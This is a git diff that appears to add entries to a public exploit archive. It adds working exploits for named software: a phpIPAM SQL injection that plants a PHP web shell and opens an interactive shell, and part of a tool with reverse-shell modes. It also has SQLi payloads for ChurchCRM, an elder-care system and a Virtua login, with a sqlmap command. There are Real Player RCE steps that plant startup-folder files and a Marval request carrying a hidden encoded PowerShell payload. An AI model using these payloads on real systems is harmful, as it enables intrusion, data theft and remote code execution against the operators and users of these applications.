targetPass = None + targetSess = None + command = None + localIP = None + localPort = None + webName = "unicord.php" # Default web shell file name + exploitMode = "web" # Default to web shell mode + + # Print help if specified or if a target or authentication is not provided + if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv): + help() + + # Collect target IP and port from CLI + if args[1] in sys.argv: + try: + if "-" in sys.argv[sys.argv.index(args[1]) + 1]: + raise + targetIP = sys.argv[sys.argv.index(args[1]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t \"{color.no}") + exit() + try: + if "-" in sys.argv[sys.argv.index(args[1]) + 2]: + raise + targetPort = sys.argv[sys.argv.index(args[1]) + 2] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t \"{color.no}") + exit() + + # Collect target username and password from CLI + if args[2] in sys.argv: + try: + if "-" in sys.argv[sys.argv.index(args[2]) + 1]: + raise + targetUser = sys.argv[sys.argv.index(args[2]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u \"{color.no}") + exit() + try: + if "-" in sys.argv[sys.argv.index(args[2]) + 2]: + raise + targetPass = sys.argv[sys.argv.index(args[2]) + 2] + except: + print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u \"{color.no}") + exit() + + # Collect PHPSESSID from CLI, if specified + if args[3] in sys.argv: + try: + if "-" in sys.argv[sys.argv.index(args[3]) + 1]: + raise + targetSess = sys.argv[sys.argv.index(args[3]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p \"{color.no}") + exit() + + # Set reverse shell mode from CLI, if specified + if args[4] in sys.argv: + exploitMode = "shell" + try: + if "-" in sys.argv[sys.argv.index(args[4]) + 1]: + raise + localIP = sys.argv[sys.argv.index(args[4]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s \"{color.no}") + exit() + try: + if "-" in sys.argv[sys.argv.index(args[4]) + 2]: + raise + localPort = sys.argv[sys.argv.index(args[4]) + 2] + except: + print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s \"{color.no}") + exit() + exploit(exploitMode,targetSess) + + # Set custom command mode from CLI, if specified + elif args[5] in sys.argv: + exploitMode = "command" + try: + if sys.argv[sys.argv.index(args[5]) + 1] in args: + raise + command = sys.argv[sys.argv.index(args[5]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c \"{color.no}") + exit() + exploit(exploitMode,targetSess) + + # Set web shell mode from CLI, if specified + elif args[6] in sys.argv: + exploitMode = "web" + try: + if sys.argv[sys.argv.index(args[6]) + 1] in args: + raise + if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]: + webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php" + else: + webName = sys.argv[sys.argv.index(args[6]) + 1] + except: + print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c \"{color.no}") + exit() + exploit(exploitMode,targetSess) + + # Run with default web shell mode if no mode is specified + else: + exploit(exploitMode,targetSess) \ No newline at end of file diff --git a/exploits/php/webapps/50963.py b/exploits/php/webapps/50963.py new file mode 100755 index 000000000..8e72308cd --- /dev/null +++ b/exploits/php/webapps/50963.py @@ -0,0 +1,88 @@ +# Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated) +# Date: 2022-04-10 +# Exploit Author: Guilherme '@behiNdyk1' Alves +# Vendor Homepage: https://phpipam.net/ +# Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5 +# Version: 1.4.5 +# Tested on: Linux Ubuntu 20.04.3 LTS + +#!/usr/bin/env python3 + +import requests +import argparse +from sys import exit, argv +from termcolor import colored + +banner = """ +█▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█ ▄█ ░ █░█ ░ █▀ █▀ █▀█ █░░ █ ▀█▀ █▀█ █▀█ █▀▀ █▀▀ +█▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█ ░█ ▄ ▀▀█ ▄ ▄█ ▄█ ▀▀█ █▄▄ █ ░█░ █▄█ █▀▄ █▄▄ ██▄ + +█▄▄ █▄█ █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀ +█▄█ ░█░ █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄\n""" +print(banner) + +parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE") + +parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True) +parser.add_argument("-usr", type=str, help="Username to log in as", required=True) +parser.add_argument("-pwd", type=str, help="User's password", required=True) +parser.add_argument("-cmd", type=str, help="Command to execute", default="id") +parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html") +parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?") +args = parser.parse_args() + +url = args.url +username = args.usr +password = args.pwd +command = args.cmd +path = args.path + +# Validating url +if url.endswith("/"): + url = url[:-1] +if not url.startswith("http://") and not url.startswith("https://"): + print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow")) + exit() + +def login(url, username, password): + """Takes an username and a password and tries to execute a login (IPAM)""" + data = { + "ipamusername": username, + "ipampassword": password + } + print(colored(f"[...] Trying to log in as {username}", "blue")) + r = requests.post(f"{url}/app/login/login_check.php", data=data) + if "Invalid username or password" in r.text: + print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red")) + exit() + else: + print(colored("[+] Login successful!", "green")) + return str(r.cookies['phpipam']) + +auth_cookie = login(url, username, password) + +def exploit(url, auth_cookie, path, command): + print(colored("[...] Exploiting", "blue")) + vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php" + data = { + "subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -", + "bgp_id": "1" + } + cookies = { + "phpipam": auth_cookie + } + requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies) + test = requests.get(f"{url}/evil.php") + if test.status_code != 200: + return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools§ion=routing&subnetId=bgp&sPage=1", "red")) + if "--shell" in argv: + while True: + command = input("Shell> ") + r = requests.get(f"{url}/evil.php?cmd={command}") + print(r.text) + else: + print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green")) + r = requests.get(f"{url}/evil.php?cmd={command}") + print(f"\n\n[+] Output:\n{r.text}") + +exploit(url, auth_cookie, path, command) \ No newline at end of file diff --git a/exploits/php/webapps/50965.txt b/exploits/php/webapps/50965.txt new file mode 100644 index 000000000..03985f0fe --- /dev/null +++ b/exploits/php/webapps/50965.txt @@ -0,0 +1,27 @@ +# Exploit Title: ChurchCRM 4.4.5 - SQLi +# Exploit Author: nu11secur1ty +# Date: 05.11.2022 +# Vendor: https://churchcrm.io/ +# Software: https://github.com/ChurchCRM/CRM +# Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325 + +## Description: +There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php. + +[+] Payloads: + +```mysql +--- +Parameter: PersonID (GET) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE +(SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: PersonID=1 AND (SELECT 7116 FROM +(SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack= +--- + +``` \ No newline at end of file diff --git a/exploits/php/webapps/50966.txt b/exploits/php/webapps/50966.txt new file mode 100644 index 000000000..381efea04 --- /dev/null +++ b/exploits/php/webapps/50966.txt @@ -0,0 +1,38 @@ +# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass +# Date: 12/06/2022 +# Exploit Author: twseptian +# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip +# Version: v1.0 +# Tested on: Kali Linux + +# Vulnerable code +line 9 in file "/oahms/admin/login.php" +$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'"); + +# Steps of reproduce: +1. Go to the admin login page http://localhost/oahms/admin/login.php +2. sqli payload: admin' or '1'='1';-- - +3. password: password + +# Proof of Concept + +POST /oahms/admin/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 71 +Origin: http://localhost +Connection: close +Referer: http://localhost/oahms/admin/login.php +Cookie: ci_session=2c1ifme2jrmeeg2nsos66he8g3m1cfgj; PHPSESSID=8vj8hke2pc1h18ek8rq8bmgiqp +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +username=admin%27+or+%271%27%3D%271%27%3B--+-&password=passwrod&submit= \ No newline at end of file diff --git a/exploits/windows/local/50953.txt b/exploits/windows/local/50953.txt new file mode 100644 index 000000000..4231e19ed --- /dev/null +++ b/exploits/windows/local/50953.txt @@ -0,0 +1,38 @@ +# Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE) +# Google Dork: n/a +# Date: May 31, 2022 +# Exploit Author: Eduardo Braun Prado +# Vendor Homepage: http://real.com/ +# Software Link: http://real.com/ +# Version: v.20.0.8.310 +# Tested on: Windows 7, 8.1, 10 +# CVE : N/A + +Full PoC: https://github.com/Edubr2020/RealPlayer_G2_RCE + +Real Player G2 Control component contains a remote code execution vulnerability because it allows 'javascript:' URIs to be passed as the argument, which +is usually not safe because in some scenarios could allow injection of script code in arbitrary domains (Universal Cross Site Scripting - uXSS) which can potentially be used to eg. steal cookies among other things. +By setting the 'URL' parameter to 'javascript:' URI and the 'target' parameter to an 'iframe' html element, it´s possible to cause javascript code to run in the context of a local error page displayed after using the very same +Control to navigate to an invalid URI such as 'mhtml:http://%SERVER%/frame.htm': when an 'mhtml:' URI is invoked by MS IE rendering engine, it expects an MHTML file with an extension whose MIME type is set to "message/rfc822", which is the +case for '.mht' files; '.htm' files have its MIME set to 'text/html' and thus IE will cancel loading the document and display a local error page (navigation cancelled). The local error page address is 'res://ieframe.dll/navcancl.htm' which belongs to the +'My computer' security zone of IE / Windows which allows reading of arbitrary local files and also arbitrary code execution by design. +Prohibiting the 'javascript:' URI in the control mitigates the issue. + +The PoC uses the 'SYSMON' ActiveX control to plant an HTA file to the user´s startup folder, which will be executed on next logon or boot. an HTA file can contain code to eg. download or extract an embedded EXE file and run it. +The PoC assumes Real Player has its current working directory set to a subdirectory of the user´s home directory. Upon downloading files using eg. web browsers, they will be downloaded to the user´s 'Downloads' folder by default, so we don´t need to retrieve the Windows user name +to be able to plant the HTA file in the startup folder. This is just for convenience purposes as it´s possible to retrieve this info through a variety of ways, including the MS Web Browser ActiveX. + +Vulnerability can be exploited by opening a Real Player playlist file such as RAM files. + +To reproduce the issue, do the following: + +a) Setup a web server +b) on the web server root directory, extract the "RP_G2" folder to it. +c) open the just extracted "RP_G2" folder and then open the following files in a text editor: +"poc.htm", "sm_rpx.js", "start.ram". Just replace every occurance of the string %SERVER% with the actual web server´s IP address (on each of the files) +d) make sure the web server is accessible and all involved files too. on MS IIS web server you may need to add a new extension and associate it with a MIME type, so do it to associate the .RAM extension with the MIME "audio/x-pn-realaudio". +e) on the client side (victim), open the web browser and download the "start.ram" file (or can be accessed eg. using a URL protocol such as 'rtsp:') and open it. You should see an HTA file being planted in the user´s startup folder after a few seconds. + +Note: to open startup folder do this: open the "Run" menu and then type: + +shell:Startup \ No newline at end of file diff --git a/exploits/windows/local/50954.txt b/exploits/windows/local/50954.txt new file mode 100644 index 000000000..3d8b7f3b9 --- /dev/null +++ b/exploits/windows/local/50954.txt @@ -0,0 +1,29 @@ +# Exploit Title: Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE) +# Google Dork: n/a +# Date: May 31, 2022 +# Exploit Author: Eduardo Braun Prado +# Vendor Homepage: http://real.com/ +# Software Link: http://real.com/ +# Version: ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309 +# Tested on: Windows 7, 8.1, 10 +# CVE : N/A + +PoC: https://github.com/Edubr2020/RP_Import_RCE/raw/main/RP_Import_RCE.zip +vídeo: https://youtu.be/CONlijEgDLc + +Real Player uses Microsoft Internet Explorer functionality and exposes properties and methods through a special mean which is application specific: + +The 'external' object and it exposes several custom methods and properties. + +The 'Import()' method is handled in unsafe way regarding the 'Copy to My Music' parameter, which allows for arbitrary file types downloading +which could be unsafe as only audio/image/video types should be allowed to download to the user´s disk. Additionally it does not properly sanitize file paths +allowing planting of arbitrary files on arbitrary locations. Even though it displays an error because it cannot render the downloaded file, the file remains until the user +closes the dialog box. Additionally when opening new windows, Real Player looks for an old, obsolete IE library (shdoclc.dll), which can also be abused to run code automatically without needing to wait +until reboot (true when file is planted in 'startup' folder). + +The attacker needs to host the files to be copied/downloaded in an SMB or WebDav share. +The directory 'appdata' must be placed in the share's root. + +The PoC will drop 'shdoclc.dll' (has simple code to run 'cmd.exe' at 'DllMain()' for demonstration purposes) to the user´s 'windowsapps' folder and 'write.exe' to 'startup' folder, so it works universally (any Windows version from at least XP up to 11) + +tested on RP ver. 16.00.282, 16.0.3.51, Cloud 17.0.9.17, v.20.0.7.309 \ No newline at end of file diff --git a/exploits/windows/local/50959.txt b/exploits/windows/local/50959.txt new file mode 100644 index 000000000..2393f5796 --- /dev/null +++ b/exploits/windows/local/50959.txt @@ -0,0 +1,29 @@ +# Exploit Title: HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path +# Date: 2022-06-06 +# Exploit Author: Ali Alipour +# Vendor Homepage: https://support.hp.com/us-en/document/c01998934 +# Software Link: https://support.hp.com/us-en/drivers/selfservice/hp-laserjet-pro-m1212nf-multifunction-printer-series/3965847 +# Version: 20180815_1 +# Tested on: Windows 10 Pro x64 +# CVE : N/A + +# Service info: + +C:\Users\Wr3ak>sc qc "HPM1210RcvFaxSrvc" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: HPM1210RcvFaxSrvc + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\HP\HP LaserJet M1210 MFP Series\ReceiveFaxUtility.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : HP LaserJet Professional M1210 MFP Series Receive Fax Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +#Exploit: + +The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/remote/50956.txt b/exploits/windows/remote/50956.txt new file mode 100644 index 000000000..fc47b5bb3 --- /dev/null +++ b/exploits/windows/remote/50956.txt @@ -0,0 +1,28 @@ +# Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated) +# Date: 27/5/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://www.marvalnorthamerica.com/ +# Software Link: https://www.marvalnorthamerica.com/ +# Version: v14.19.0.12476 +# Tested on: Windows +# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rce + +POST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2 +Host: MSMHandler.io +Cookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 +Accept: application/json, text/javascript, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 456 +Origin: https://MSMHandler.io +Dnt: 1 +Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers + +type=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true \ No newline at end of file diff --git a/exploits/windows/remote/50957.txt b/exploits/windows/remote/50957.txt new file mode 100644 index 000000000..5a5cad9ed --- /dev/null +++ b/exploits/windows/remote/50957.txt @@ -0,0 +1,18 @@ +# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF) +# Date: 27/5/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://www.marvalnorthamerica.com/ +# Software Link: https://www.marvalnorthamerica.com/ +# Version: v14.19.0.12476 +# Tested on: Windows +# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY +# 2FA Bypass: + + + + +
+ +
+ + \ No newline at end of file diff --git a/exploits/windows/remote/50958.txt b/exploits/windows/remote/50958.txt new file mode 100644 index 000000000..d00c6196d --- /dev/null +++ b/exploits/windows/remote/50958.txt @@ -0,0 +1,57 @@ +# Exploit Title: Virtua Software Cobranca 12S - SQLi +# Shodan Query: http.favicon.hash:876876147 +# Date: 13/08/2021 +# Exploit Author: Luca Regne +# Vendor Homepage: https://www.virtuasoftware.com.br/ +# Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe +# Version: 12S +# Tested on: Windows Server 2019 +# CVE : CVE-2021-37589 +------------------------------------------------------------------------ + + +## Description +A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. + +## Request PoC +``` +POST /controller/login.php?acao=autenticar HTTP/1.1 +Host: redacted.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 37 +Connection: close +Cookie: origem_selecionado=; PHPSESSID= + +idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario + +``` + +This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. + +``` +POST /controller/login.php?acao=autenticar HTTP/1.1 +Host: redacted.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 37 +Connection: close +Cookie: origem_selecionado=; PHPSESSID= + +idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario + +``` + +## Exploit +Save the request from burp to file +```bash +python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent +``` \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8585cecdc..4a7c3cc8c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11486,6 +11486,9 @@ id,file,description,date,author,type,platform,port 50903,exploits/windows/local/50903.txt,"Wondershare Dr.Fone 11.4.10 - Insecure File Permissions",1970-01-01,AkuCyberSec,local,windows, 50911,exploits/linux/local/50911.py,"ExifTool 12.23 - Arbitrary Code Execution",1970-01-01,UNICORD,local,linux, 50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",1970-01-01,"Netanel Cohen",local,windows, +50953,exploits/windows/local/50953.txt,"Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows, +50954,exploits/windows/local/50954.txt,"Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows, +50959,exploits/windows/local/50959.txt,"HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path",1970-01-01,"Ali Alipour",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18701,6 +18704,12 @@ id,file,description,date,author,type,platform,port 50948,exploits/hardware/remote/50948.py,"Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Bryan Leong",remote,hardware, 50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",1970-01-01,LiquidWorm,remote,hardware, 50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",1970-01-01,"Ahmed Alroky",remote,hardware, +50956,exploits/windows/remote/50956.txt,"Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Momen Eldawakhly",remote,windows, +50958,exploits/windows/remote/50958.txt,"Virtua Software Cobranca 12S - SQLi",1970-01-01,"Luca Regne",remote,windows, +50957,exploits/windows/remote/50957.txt,"Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Momen Eldawakhly",remote,windows, +50960,exploits/hardware/remote/50960.py,"Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Filip Carlsson",remote,hardware, +50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Tomas Melicher",remote,hardware, +50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -45015,3 +45024,10 @@ id,file,description,date,author,type,platform,port 50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php, 50951,exploits/php/webapps/50951.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Sanjay Singh",webapps,php, 50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",1970-01-01,"Fellipe Oliveira",webapps,java, +50955,exploits/multiple/webapps/50955.txt,"Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)",1970-01-01,"Andrea Intilangelo",webapps,multiple, +50961,exploits/php/webapps/50961.py,"Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,UNICORD,webapps,php, +50963,exploits/php/webapps/50963.py,"phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Guilherme Alves",webapps,php, +50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",1970-01-01,nu11secur1ty,webapps,php, +50966,exploits/php/webapps/50966.txt,"Old Age Home Management System 1.0 - SQLi Authentication Bypass",1970-01-01,twseptian,webapps,php, +50967,exploits/hardware/webapps/50967.txt,"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware, +50968,exploits/hardware/webapps/50968.txt,"SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,